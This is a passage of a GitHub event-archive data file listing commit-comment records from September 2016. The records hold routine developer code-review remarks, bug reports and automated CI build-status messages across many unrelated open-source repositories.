http://mirrors.kodi.tv/test-builds/win32/KodiSetup-20160913-05843f9-retroplayer-17beta2.exe\r\nThat's a build based on my retroplayer-17beta2 branch with the 2 reverted commits you cherry-picked. Now, real question is: what changed between Sep 13th and now? Why is it complaining about MinGW now and it didn't before?"}},"created_at":"2016-09-22T08:59:23Z"}
{"id":"4601196265","type":"CommitCommentEvent","actor":{"login":"23Skidoo"},"repo":{"name":"hvr/multi-ghc-travis"},"payload":{"comment":{"id":19126855,"position":4,"line":146,"path":"make_travis_yml_2.hs","commit_id":"1b6dc0aa9c42ab9e0c4bf47c30fdec8fedddee68","created_at":"2016-09-22T08:59:33Z","updated_at":"2016-09-22T08:59:33Z","body":"> In the past the `-j` value was overestimated for Travis' VMs.\r\n\r\nCould they've been using hyperthreading?"}},"created_at":"2016-09-22T08:59:33Z"}
{"id":"4601199614","type":"CommitCommentEvent","actor":{"login":"Alucard24"},"repo":{"name":"shminer/android_kernel_lge_g5"},"payload":{"comment":{"id":19126864,"position":null,"line":null,"path":null,"commit_id":"8b952a394f85f2720524743967108988cd54377f","created_at":"2016-09-22T09:00:16Z","updated_at":"2016-09-22T09:00:16Z","body":"OK, so we can stay with OLD audio libraries and old vidc libraries. OK?"}},"created_at":"2016-09-22T09:00:16Z"}
{"id":"4601199811","type":"CommitCommentEvent","actor":{"login":"frmz"},"repo":{"name":"afollestad/polar-dashboard"},"payload":{"comment":{"id":19126866,"position":null,"line":null,"path":null,"commit_id":"d1503ad17b1e143c52c6c9176f8b3b666e8f546e","created_at":"2016-09-22T09:00:18Z","updated_at":"2016-09-22T09:00:18Z","body":"ah ok didnt see you also added the comment on top saying that they need to comment where not needed, i prefer the other way but your call :)"}},"created_at":"2016-09-22T09:00:18Z"}
{"id":"4601203527","type":"CommitCommentEvent","actor":{"login":"larryisthere"},"repo":{"name":"hwdsl2/setup-ipsec-vpn"},"payload":{"comment":{"id":19126885,"position":null,"line":null,"path":null,"commit_id":"7cdd372a6e2d80066ebd79cb52e77d584f5f873e","created_at":"2016-09-22T09:01:06Z","updated_at":"2016-09-22T09:01:06Z","body":"Great efficiency! 👍 "}},"created_at":"2016-09-22T09:01:06Z"}
{"id":"4601203935","type":"CommitCommentEvent","actor":{"login":"sils1297"},"repo":{"name":"coala/coala"},"payload":{"comment":{"id":19126887,"position":5,"line":13,"path":"coalib/results/result_actions/PrintMoreInfoAction.py","commit_id":"28bb7ebfecd2989071ece1a1fe3f38326675f8a0","created_at":"2016-09-22T09:01:12Z","updated_at":"2016-09-22T09:01:12Z","body":"+1 for `Print more info`"}},"created_at":"2016-09-22T09:01:12Z"}
{"id":"4601205472","type":"CommitCommentEvent","actor":{"login":"wufoxfm95"},"repo":{"name":"wufoxfm95/hellogit"},"payload":{"comment":{"id":19126898,"position":null,"line":null,"path":null,"commit_id":"180be9b435d4149bb645d5303dd4ba8910bc8e13","created_at":"2016-09-22T09:01:32Z","updated_at":"2016-09-22T09:01:32Z","body":"自个练习"}},"created_at":"2016-09-22T09:01:32Z"}
{"id":"4601206417","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19126907,"position":null,"line":null,"path":null,"commit_id":"f3d1fd242de1bd966357f0e949a2a91718d7d16b","created_at":"2016-09-22T09:01:45Z","updated_at":"2016-09-22T09:01:45Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.6-PullRequest.47+6](http://build.prxm.it:8813/viewLog.html?buildId=3674&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72 Build time: 00:02:52"}},"created_at":"2016-09-22T09:01:45Z"}
{"id":"4601206701","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19126910,"position":null,"line":null,"path":null,"commit_id":"f3d1fd242de1bd966357f0e949a2a91718d7d16b","created_at":"2016-09-22T09:01:48Z","updated_at":"2016-09-22T09:01:48Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.6-PullRequest.47+6](http://build.prxm.it:8813/viewLog.html?buildId=3674&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72 Build time: 00:02:54"}},"created_at":"2016-09-22T09:01:48Z"}
{"id":"4601207597","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19126918,"position":null,"line":null,"path":null,"commit_id":"6e7aeef484a0853ecd47b0b4bedb51b8dfa9306c","created_at":"2016-09-22T09:02:00Z","updated_at":"2016-09-22T09:02:00Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1095](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13848&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 246, ignored: 3 Build time: 00:08:34"}},"created_at":"2016-09-22T09:02:00Z"}
{"id":"4601207948","type":"CommitCommentEvent","actor":{"login":"webaddkevin"},"repo":{"name":"webaddkevin/ShortCutPhotoZoomPro"},"payload":{"comment":{"id":19126919,"position":null,"line":null,"path":null,"commit_id":"9c8cd6c7f15a438462f43879f6d070c2acb338bf","created_at":"2016-09-22T09:02:04Z","updated_at":"2016-09-22T09:02:04Z","body":"delete this"}},"created_at":"2016-09-22T09:02:04Z"}
{"id":"4601208135","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"shminer/android_kernel_lge_g5"},"payload":{"comment":{"id":19126922,"position":null,"line":null,"path":null,"commit_id":"8b952a394f85f2720524743967108988cd54377f","created_at":"2016-09-22T09:02:06Z","updated_at":"2016-09-22T09:02:06Z","body":"OK!"}},"created_at":"2016-09-22T09:02:06Z"}
{"id":"4601212637","type":"CommitCommentEvent","actor":{"login":"Bosken85"},"repo":{"name":"Bosken85/errors_aspnetcore"},"payload":{"comment":{"id":19126936,"position":null,"line":null,"path":null,"commit_id":"67628e6ff4549743e0e8590df437c7ecc13dd50a","created_at":"2016-09-22T09:03:06Z","updated_at":"2016-09-22T09:03:06Z","body":"Merge from master"}},"created_at":"2016-09-22T09:03:06Z"}
{"id":"4601219781","type":"CommitCommentEvent","actor":{"login":"leppie"},"repo":{"name":"driftyco/ionic2-app-base"},"payload":{"comment":{"id":19126950,"position":null,"line":null,"path":null,"commit_id":"fd5bb144c104cbe3beb364b081075fe2e0b0f3b1","created_at":"2016-09-22T09:04:43Z","updated_at":"2016-09-22T09:04:43Z","body":"If you remove copy, fonts dont get copied :("}},"created_at":"2016-09-22T09:04:43Z"}
{"id":"4601220594","type":"CommitCommentEvent","actor":{"login":"shinchiro"},"repo":{"name":"shinchiro/shinchiro-encodes"},"payload":{"comment":{"id":19126953,"position":null,"line":null,"path":null,"commit_id":"835362bcc6e082efd422c21c4251252280a94269","created_at":"2016-09-22T09:04:55Z","updated_at":"2016-09-22T09:04:55Z","body":"Don't know. What particularly series you need from me? If it is new game -\n12, it already inside the folder\n\n>\n"}},"created_at":"2016-09-22T09:04:55Z"}
{"id":"4601223660","type":"CommitCommentEvent","actor":{"login":"CRtEurope"},"repo":{"name":"roundcube/roundcubemail"},"payload":{"comment":{"id":19126961,"position":null,"line":null,"path":null,"commit_id":"c1c0a0d815b90dc35af28ba71fc988f7badb1af0","created_at":"2016-09-22T09:05:35Z","updated_at":"2016-09-22T09:05:35Z","body":"That was not a good idea. Now we all permanently get connection errors every few moments. And the email boxes remain empty. After logging out and logging in again everything seems to work as usual but a moment later you again get connection errors.\r\nIt would be better to withdraw this change as before everything worked perfectly without any connection error."}},"created_at":"2016-09-22T09:05:35Z"}
{"id":"4601224002","type":"CommitCommentEvent","actor":{"login":"opipipy"},"repo":{"name":"opipipy/opipipy.github.io"},"payload":{"comment":{"id":19126963,"position":4,"line":4,"path":"fonts/opensans-bold-webfont.svg","commit_id":"acc40ce7ef1b7befb1f5e0f2e110d40800f13e83","created_at":"2016-09-22T09:05:39Z","updated_at":"2016-09-22T09:05:39Z","body":"ASDdasdf"}},"created_at":"2016-09-22T09:05:39Z"}
{"id":"4601237949","type":"CommitCommentEvent","actor":{"login":"segunadeleye"},"repo":{"name":"damilola-dealdey/CSSTrack"},"payload":{"comment":{"id":19126995,"position":39,"line":39,"path":"Ex Three/style.css","commit_id":"50de05d10460397e2cde42f012fb3cc877fd7c20","created_at":"2016-09-22T09:08:26Z","updated_at":"2016-09-22T09:08:26Z","body":"Remove empty styles"}},"created_at":"2016-09-22T09:08:26Z"}
{"id":"4601239659","type":"CommitCommentEvent","actor":{"login":"segunadeleye"},"repo":{"name":"damilola-dealdey/CSSTrack"},"payload":{"comment":{"id":19127000,"position":30,"line":28,"path":"Ex Three/index.html","commit_id":"50de05d10460397e2cde42f012fb3cc877fd7c20","created_at":"2016-09-22T09:08:50Z","updated_at":"2016-09-22T09:08:50Z","body":"Don't use `<table>` tags"}},"created_at":"2016-09-22T09:08:50Z"}
{"id":"4601239665","type":"CommitCommentEvent","actor":{"login":"sirkay777"},"repo":{"name":"sirkay777/DoubanBookApp"},"payload":{"comment":{"id":19127001,"position":7,"line":7,"path":"js/AboutScreen.js","commit_id":"e7483a58bb9fa0cbc5ef70f5d3559452ac664d6f","created_at":"2016-09-22T09:08:51Z","updated_at":"2016-09-22T09:08:51Z","body":"thanks"}},"created_at":"2016-09-22T09:08:51Z"}
{"id":"4601240166","type":"CommitCommentEvent","actor":{"login":"laughingowl"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19127005,"position":null,"line":null,"path":null,"commit_id":"959c2d264f5d976f087c8682776cd8bd7c32ea9e","created_at":"2016-09-22T09:08:57Z","updated_at":"2016-09-22T09:08:57Z","body":"Ahh see then that isnt a real test :-)  need somebody to clear (or just spawn) a baby on live  and then a real CH use the actual train skill :-)\r\n\r\n"}},"created_at":"2016-09-22T09:08:57Z"}
{"id":"4601243934","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19127011,"position":null,"line":null,"path":null,"commit_id":"e1ec00e502994ae29286e991e14c8c126a87f148","created_at":"2016-09-22T09:09:47Z","updated_at":"2016-09-22T09:09:47Z","body":"121784677-OAControllerFixes4633 (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (2339 of 2341 tests passed, 570 test warnings)\n\n * 572 tests had: AUD diffs.\n * 11 tests had: RDD diffs.\n * 9 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTR small diffs.\n * 4 tests had: Table small diffs.\n * 7 tests had: ESO small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e1ec00e502994ae29286e991e14c8c126a87f148-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e1ec00e502994ae29286e991e14c8c126a87f148-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.91%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T09:09:47Z"}
{"id":"4601246979","type":"CommitCommentEvent","actor":{"login":"wittawatj"},"repo":{"name":"wittawatj/gatsby-bootcamp-2016"},"payload":{"comment":{"id":19127023,"position":null,"line":null,"path":null,"commit_id":"5455da5ab8a74c75e5b842a26447cf689b8c3b3c","created_at":"2016-09-22T09:10:25Z","updated_at":"2016-09-22T09:10:25Z","body":"I created a private repo and added you as a collaborator."}},"created_at":"2016-09-22T09:10:25Z"}
{"id":"4601252079","type":"CommitCommentEvent","actor":{"login":"kraftek"},"repo":{"name":"senbox-org/s2tbx"},"payload":{"comment":{"id":19127038,"position":41,"line":147,"path":"s2tbx-s2msi-reader/src/main/java/org/esa/s2tbx/dataio/s2/l1b/L1bMetadata.java","commit_id":"715d0cd2648fd95d746627004f3f84b709f55454","created_at":"2016-09-22T09:11:32Z","updated_at":"2016-09-22T09:11:32Z","body":"I don't. Just took that from the MetadataElement parseAll(Element) method. Indeed, no need to exclude them."}},"created_at":"2016-09-22T09:11:32Z"}
{"id":"4601252536","type":"CommitCommentEvent","actor":{"login":"vinodborole"},"repo":{"name":"olivierlemasle/openstack4j"},"payload":{"comment":{"id":19127040,"position":4,"line":127,"path":"connectors/httpclient/src/main/java/org/openstack4j/connectors/httpclient/HttpResponseImpl.java","commit_id":"78cebce360b7cb7c23014ad08b3f7bc354566636","created_at":"2016-09-22T09:11:39Z","updated_at":"2016-09-22T09:11:39Z","body":"Do we need a null check for entity.getContent() ?"}},"created_at":"2016-09-22T09:11:39Z"}
{"id":"4601257862","type":"CommitCommentEvent","actor":{"login":"tomverweij"},"repo":{"name":"tomverweij/myFirstRepo"},"payload":{"comment":{"id":19127061,"position":null,"line":null,"path":null,"commit_id":"d2216f9f7bbc102476e6aa0c005b4680bcc29ddf","created_at":"2016-09-22T09:12:48Z","updated_at":"2016-09-22T09:12:48Z","body":"Test commenting on your commit, Tom!\r\nWhat's with the hello again?\r\nBetter make it go away...\r\nCheers\r\nT"}},"created_at":"2016-09-22T09:12:48Z"}
{"id":"4601259400","type":"CommitCommentEvent","actor":{"login":"alecpl"},"repo":{"name":"roundcube/roundcubemail"},"payload":{"comment":{"id":19127066,"position":null,"line":null,"path":null,"commit_id":"c1c0a0d815b90dc35af28ba71fc988f7badb1af0","created_at":"2016-09-22T09:13:11Z","updated_at":"2016-09-22T09:13:11Z","body":"Are you sure? I don't see how it could be. Part of this is not used at all and part only on caches \"closing\" so, really it would be strange. Are you using memcache? What connection errors?"}},"created_at":"2016-09-22T09:13:11Z"}
{"id":"4601259743","type":"CommitCommentEvent","actor":{"login":"nemobis"},"repo":{"name":"MusikAnimal/pageviews"},"payload":{"comment":{"id":19127067,"position":5,"line":134,"path":"messages/ko.json","commit_id":"b95f99cad12d4200421162154fb7f5e040ed564b","created_at":"2016-09-22T09:13:15Z","updated_at":"2016-09-22T09:13:15Z","body":"There was a comment about this rename at https://translatewiki.net/wiki/Thread:User_talk:FuzzyBot/Postposition_/ko but everything looks alright."}},"created_at":"2016-09-22T09:13:15Z"}
{"id":"4601261232","type":"CommitCommentEvent","actor":{"login":"max-borisov"},"repo":{"name":"max-borisov/BIIR-CV"},"payload":{"comment":{"id":19127070,"position":null,"line":null,"path":null,"commit_id":"9670311a79b0348aa06cb27192defddfb328d76a","created_at":"2016-09-22T09:13:35Z","updated_at":"2016-09-22T09:13:35Z","body":"- update quick_filter database view\r\n- create filter/quick and filter/advanced\r\n- update tests\r\n- update users controller\r\n- add tsv index to career and education tables"}},"created_at":"2016-09-22T09:13:35Z"}
{"id":"4601267045","type":"CommitCommentEvent","actor":{"login":"jmagraner"},"repo":{"name":"wittawatj/gatsby-bootcamp-2016"},"payload":{"comment":{"id":19127086,"position":null,"line":null,"path":null,"commit_id":"5455da5ab8a74c75e5b842a26447cf689b8c3b3c","created_at":"2016-09-22T09:14:51Z","updated_at":"2016-09-22T09:14:51Z","body":"thanksss\n\nJoana Soldado Magraner\nPhD candidate\nGatsby Computational Neuroscience Unit\nUniversity College London\n25 Howland St, London\n\nOn Thu, Sep 22, 2016 at 10:10 AM, Wittawat Jitkrittum <\nnotifications@github.com> wrote:\n\n> I created a private repo and added you as a collaborator.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/wittawatj/gatsby-bootcamp-2016/commit/5455da5ab8a74c75e5b842a26447cf689b8c3b3c#commitcomment-19127023>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AHpyHCxIASifEs2bhQ4LQWs1D3Qaxby5ks5qskYBgaJpZM4KDoZk>\n> .\n>\n"}},"created_at":"2016-09-22T09:14:51Z"}
{"id":"4601268211","type":"CommitCommentEvent","actor":{"login":"wangxiaoerzuiaizhangxiaohua"},"repo":{"name":"wangxiaoerzuiaizhangxiaohua/zhangyanli.github.io"},"payload":{"comment":{"id":19127089,"position":null,"line":null,"path":null,"commit_id":"f98d51c8a44cf1b26005ec599078e0f4603d16ed","created_at":"2016-09-22T09:15:06Z","updated_at":"2016-09-22T09:15:06Z","body":"finish"}},"created_at":"2016-09-22T09:15:06Z"}
{"id":"4601268395","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127090,"position":null,"line":null,"path":null,"commit_id":"a1be64caba2eedb46e8fe15c0081c33aac767049","created_at":"2016-09-22T09:15:08Z","updated_at":"2016-09-22T09:15:08Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1096](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13853&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T09:15:08Z"}
{"id":"4601272414","type":"CommitCommentEvent","actor":{"login":"hemanshu22"},"repo":{"name":"react-toolbox/react-toolbox"},"payload":{"comment":{"id":19127102,"position":1,"line":2,"path":"components/app_bar/AppBar.js","commit_id":"67d4628e8200a28fd9885e5ea626759c9a903880","created_at":"2016-09-22T09:15:57Z","updated_at":"2016-09-22T09:15:57Z","body":"dfgdgdgdsgre"}},"created_at":"2016-09-22T09:15:57Z"}
{"id":"4601278630","type":"CommitCommentEvent","actor":{"login":"Nozlaf"},"repo":{"name":"Nozlaf/WeBid"},"payload":{"comment":{"id":19127123,"position":null,"line":null,"path":null,"commit_id":"27430b9b5aac8850a76f1879bc6281ea1617ed48","created_at":"2016-09-22T09:17:19Z","updated_at":"2016-09-22T09:17:19Z","body":"this is untested as I dont have a working test environment at the moment\r\n"}},"created_at":"2016-09-22T09:17:19Z"}
{"id":"4601279232","type":"CommitCommentEvent","actor":{"login":"incubus"},"repo":{"name":"ondrejbartas/sidekiq-cron"},"payload":{"comment":{"id":19127124,"position":10,"line":61,"path":"lib/sidekiq/cron/job.rb","commit_id":"b0c22b4562375f86275c1476646380de4982de5a","created_at":"2016-09-22T09:17:27Z","updated_at":"2016-09-22T09:17:27Z","body":"Hi! This breaks simple configuration:\r\n\r\nmain_loader:\r\n  cron: '* * * * *'\r\n  class: 'Worker::FetchLoader'\r\n  queue: main\r\n  args:\r\n    type: main\r\n\r\ncomments_loader:\r\n  cron: '* * * * *'\r\n  class: 'Worker::FetchLoader'\r\n  queue: comments\r\n  args:\r\n    type: comments\r\n\r\n Now Worker::FetchLoader always executes in the default queue."}},"created_at":"2016-09-22T09:17:27Z"}
{"id":"4601280087","type":"CommitCommentEvent","actor":{"login":"MartinoBorsato"},"repo":{"name":"MartinoBorsato/HOPdiscussion"},"payload":{"comment":{"id":19127126,"position":null,"line":null,"path":null,"commit_id":"27db49f3a996da2076bccd57b681622849f863d5","created_at":"2016-09-22T09:17:39Z","updated_at":"2016-09-22T09:17:39Z","body":"I answer to your points in order:\r\n* yes you are right, but I think one can use DecayTreeFitter to compute the B mass with the Jpsi mass constraint. Actually even a simple rescaling of the electron energy to get m(ee)=m(Jpsi) makes the B-mass resolution much much better. See below the effect on data.\r\n![image](https://cloud.githubusercontent.com/assets/15674880/18742438/833d0b12-80b4-11e6-9fe8-921fa8fd45dc.png)\r\n\r\n* OK, then maybe we can drop it. In any case the normal B-reco mass info has to be used. I mean, the HOP mass cannot substitute the normal reco mass, so the easiest is to cut on HOP and then fit the B-mass as usual.\r\n* Some time ago I found that cutting on HopMee rather than reco m(ee) allowed to have a little bit less q2 bin migration. So it's definitely worth including it in the output of the tool.\r\n\r\nFor the generalisation:\r\n* I think the Jpsi constraint is no very useful. I mean if one knows the intermediate state mass, one can use DecayTreeFitter or a normal rescaling of momenta.\r\n* I completely agree there should be a HOP tool for CaloPhotons! Yesterday Zhirui presented some impressive results at RD (see below)\r\n![image](https://cloud.githubusercontent.com/assets/15674880/18742740/2811dfe0-80b6-11e6-8a7c-b17330b89681.png)\r\n"}},"created_at":"2016-09-22T09:17:39Z"}
{"id":"4601280914","type":"CommitCommentEvent","actor":{"login":"gyoshev"},"repo":{"name":"telerik/kendo-common-tasks"},"payload":{"comment":{"id":19127127,"position":null,"line":null,"path":null,"commit_id":"06a730e32786b676864d85c6cc54b925442ab36f","created_at":"2016-09-22T09:17:50Z","updated_at":"2016-09-22T09:17:50Z","body":"[No problem](http://s2.quickmeme.com/img/4e/4e7c4fec1974025c4aeae464c3f566df46c55a3bff664ac3afb28164535db7b8.jpg)."}},"created_at":"2016-09-22T09:17:50Z"}
{"id":"4601287059","type":"CommitCommentEvent","actor":{"login":"mnns1234"},"repo":{"name":"mnns1234/market"},"payload":{"comment":{"id":19127143,"position":null,"line":null,"path":null,"commit_id":"285c525741c9546e8e82097ac5987c88514f3f65","created_at":"2016-09-22T09:19:08Z","updated_at":"2016-09-22T09:19:08Z","body":"![central-3](https://cloud.githubusercontent.com/assets/22358263/18742788/e8a6a1ec-806a-11e6-865d-7437089a1abe.jpg)\r\n"}},"created_at":"2016-09-22T09:19:08Z"}
{"id":"4601295674","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"FireLord1/android_device_samsung_a7alte"},"payload":{"comment":{"id":19127160,"position":6,"line":8,"path":"ramdisk/init.universal5430.rc","commit_id":"56e32f99030a78c3d2ea9342609377af8483cb3e","created_at":"2016-09-22T09:20:59Z","updated_at":"2016-09-22T09:20:59Z","body":"CM implements sysinit for init.d by default for all builds, this is unneeded"}},"created_at":"2016-09-22T09:20:59Z"}
{"id":"4601296813","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"FireLord1/android_device_samsung_a7alte"},"payload":{"comment":{"id":19127163,"position":5,"line":7,"path":"ramdisk/init.universal5430.rc","commit_id":"56e32f99030a78c3d2ea9342609377af8483cb3e","created_at":"2016-09-22T09:21:12Z","updated_at":"2016-09-22T09:21:12Z","body":"And potentially this too"}},"created_at":"2016-09-22T09:21:12Z"}
{"id":"4601300014","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127166,"position":null,"line":null,"path":null,"commit_id":"6974dab924fc0e697849ad36227d87d689223f54","created_at":"2016-09-22T09:21:55Z","updated_at":"2016-09-22T09:21:55Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1097](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13857&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T09:21:55Z"}
{"id":"4601311062","type":"CommitCommentEvent","actor":{"login":"vBm"},"repo":{"name":"kasper93/mpc-hc"},"payload":{"comment":{"id":19127179,"position":null,"line":null,"path":null,"commit_id":"1b93a376d59cfd79ed5c4c0fcce290b10bd4dbc1","created_at":"2016-09-22T09:24:18Z","updated_at":"2016-09-22T09:24:18Z","body":"This one closes #5873"}},"created_at":"2016-09-22T09:24:18Z"}
{"id":"4601313434","type":"CommitCommentEvent","actor":{"login":"FireLord1"},"repo":{"name":"FireLord1/android_device_samsung_a7alte"},"payload":{"comment":{"id":19127185,"position":6,"line":8,"path":"ramdisk/init.universal5430.rc","commit_id":"56e32f99030a78c3d2ea9342609377af8483cb3e","created_at":"2016-09-22T09:24:49Z","updated_at":"2016-09-22T09:24:49Z","body":"ohh okay "}},"created_at":"2016-09-22T09:24:49Z"}
{"id":"4601313560","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127186,"position":null,"line":null,"path":null,"commit_id":"a1be64caba2eedb46e8fe15c0081c33aac767049","created_at":"2016-09-22T09:24:50Z","updated_at":"2016-09-22T09:24:50Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1096](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13853&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:09:42"}},"created_at":"2016-09-22T09:24:50Z"}
{"id":"4601320467","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/style-guide"},"payload":{"comment":{"id":19127196,"position":null,"line":null,"path":null,"commit_id":"cfcb58121b1d7aff6b045354aebccbb151ebd1df","created_at":"2016-09-22T09:26:16Z","updated_at":"2016-09-22T09:26:16Z","body":"These comments make sense, Peter, and I'll address them / reword them later when I can get back to this. Thanks for getting them in there in the meantime."}},"created_at":"2016-09-22T09:26:16Z"}
{"id":"4601321197","type":"CommitCommentEvent","actor":{"login":"uldza"},"repo":{"name":"dailymotion/hls.js"},"payload":{"comment":{"id":19127200,"position":null,"line":null,"path":null,"commit_id":"961b5e67f8d998266a11898a6d860f13bdbfaf7f","created_at":"2016-09-22T09:26:25Z","updated_at":"2016-09-22T09:26:25Z","body":"@mangui when these changes are planed and be available as next minor release: `0.6.2-7` ?"}},"created_at":"2016-09-22T09:26:25Z"}
{"id":"4601327892","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/releasetasks"},"payload":{"comment":{"id":19127214,"position":null,"line":null,"path":null,"commit_id":"9f90a9906f4194c9e3120d9c5c6e1a975ce5a100","created_at":"2016-09-22T09:27:50Z","updated_at":"2016-09-22T09:27:50Z","body":"TaskCluster: @cgsheeh does not have permission to trigger tasks."}},"created_at":"2016-09-22T09:27:50Z"}
{"id":"4601327934","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19127215,"position":6,"line":6,"path":"examples/plugins/http-requests/test-http-requests.sh","commit_id":"be2616ba260f4b5f94e93eabd85a699880129793","created_at":"2016-09-22T09:27:51Z","updated_at":"2016-09-22T09:27:51Z","body":"can you explain shortly why? I fear it will puzzle readers. Maybe something like\r\n```\r\n# long-term connection, so there is always at least one connection visible in the the httpd view\r\n```"}},"created_at":"2016-09-22T09:27:51Z"}
{"id":"4601327955","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127216,"position":null,"line":null,"path":null,"commit_id":"a1be64caba2eedb46e8fe15c0081c33aac767049","created_at":"2016-09-22T09:27:51Z","updated_at":"2016-09-22T09:27:51Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1098](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13860&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T09:27:51Z"}
{"id":"4601327993","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127217,"position":null,"line":null,"path":null,"commit_id":"085107be625dcca5bd9d362d0013f42cfc0cad7d","created_at":"2016-09-22T09:27:52Z","updated_at":"2016-09-22T09:27:52Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1099](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13861&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T09:27:52Z"}
{"id":"4601328020","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127218,"position":null,"line":null,"path":null,"commit_id":"75d069d883f5fe2a48132cf058d3b4527b3baffb","created_at":"2016-09-22T09:27:52Z","updated_at":"2016-09-22T09:27:52Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1100](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13862&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T09:27:52Z"}
{"id":"4601328116","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/releasetasks"},"payload":{"comment":{"id":19127219,"position":null,"line":null,"path":null,"commit_id":"7185dc9023de45f17acf87c4bf089ac63f97d0e7","created_at":"2016-09-22T09:27:53Z","updated_at":"2016-09-22T09:27:53Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ERI_h8FWR06IxRxSzFJDqA"}},"created_at":"2016-09-22T09:27:53Z"}
{"id":"4601329136","type":"CommitCommentEvent","actor":{"login":"jonashaag"},"repo":{"name":"vmprof/vmprof-server"},"payload":{"comment":{"id":19127220,"position":10,"line":12,"path":"vmprofile/models.py","commit_id":"f5610bcc4c154437e529ebd44e5c5cf37e7045ca","created_at":"2016-09-22T09:28:04Z","updated_at":"2016-09-22T09:28:04Z","body":"why not `runtime_id`?"}},"created_at":"2016-09-22T09:28:04Z"}
